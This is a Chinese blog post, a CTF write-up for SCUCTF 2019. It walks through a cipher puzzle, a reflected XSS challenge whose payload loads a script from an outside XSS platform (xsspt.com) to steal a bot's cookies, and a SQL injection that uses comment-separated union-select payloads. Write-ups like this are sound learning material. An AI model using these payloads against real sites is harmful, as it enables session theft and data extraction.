SCUCTF-Writeup

初稿写于—-2019年5月18日—-

0x00 佛说,让你签个到

“与佛论禅”算法嘛,

佛曰:爍怯心切怯曰沙上不侄特缽三醯梵恐梵有怯伽怖奢曳度奢爍藐呐怛哆爍多俱數上羯梵夷爍竟麼侄恐瑟梵真死奢豆缽老怯世怯爍皤夜諳佛冥漫苦罰耨所佛奢寫曰有俱南老侄想俱跋耶藝倒俱顛侄是娑跋夷即缽瑟故諳若俱提參

在网页上解密,得到获取flag的提示

Flag

scuctf{W31c0me_to_scUcTF2ol9}

0x01 简单的XSS

解题思路,解题脚本,过程截图

  1. 思路

对于这道题来说,一看link2知道,url里有可控参数greet,填入<script>alert(1)</script>,提示如下:

确定是反射型xss;

那么下一步,需要让有flag的人访问,谁有呢?

进入link1,哟——有输入框(查看源码发现是自动访问填入链接的js代码),那么开冲:去网上xss平台上申请获取cookie的xss代码,直接填入payload,提交,看到获取的cookie

  • 解题脚本

<script src=//xsspt.com/jsNaUw></script>

Flag

scuctf{l0v3_15_s0_w4rm}

0x03 Baby SQLi(虽然最后没有得到flag…但还是写一写思路以求交流吧)

Sql注入嘛,发现id后只能有数字,并且空格和and都被禁止了,于是采取注释来分隔关键词;另外通过字符报错,错误回显Table ‘scuctf.field’ doesn’t exist,得到库名scuctf,那么到information_schema里查列名,用limit一个一个往外查,得到flag的表结构如右图所示。

唉,手工爆表名列名的时候,觉得自己真的是IT农民工…大佬与菜鸡的区别就在于繁琐的工作是否能自动化吧!

显然,flag表里肯定有flag了

构造payload如下:

http://47.96.138.65:45787/?id=1-1/**/union/**/select/**/fffffffl11lgg,

flag,FLAG,secert/**/from/**/scuctf.flag

什么都没有…

题目对我来说的确有点难度了,希望赛后dalao们尽快出write up 啊

附上对我帮助特大的一张图


2019年5月25日—–续上

呵呵哒,经验问题,其实是flag是被屏蔽了,才显示不出来的。具体就是用mid或是substr来一个个往外拉数据,payload格式等我有空再附上来(鸽稿警告)

好了,你们要的payload附上来了

MID函数的用法为SELECT MID(ColumnName, Start [, Length])

只要把20一直往上改就好了,直到出现屏蔽提示, 那前一个数字输出的就是少一个字母的flag,此时只要再把最后一个字母输出来就可以了!

BabySQLi完整payload

拼在一起,得到完整flag,完事儿!

作者: Henry

Learn to share and enjoy life, that's why I am here

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据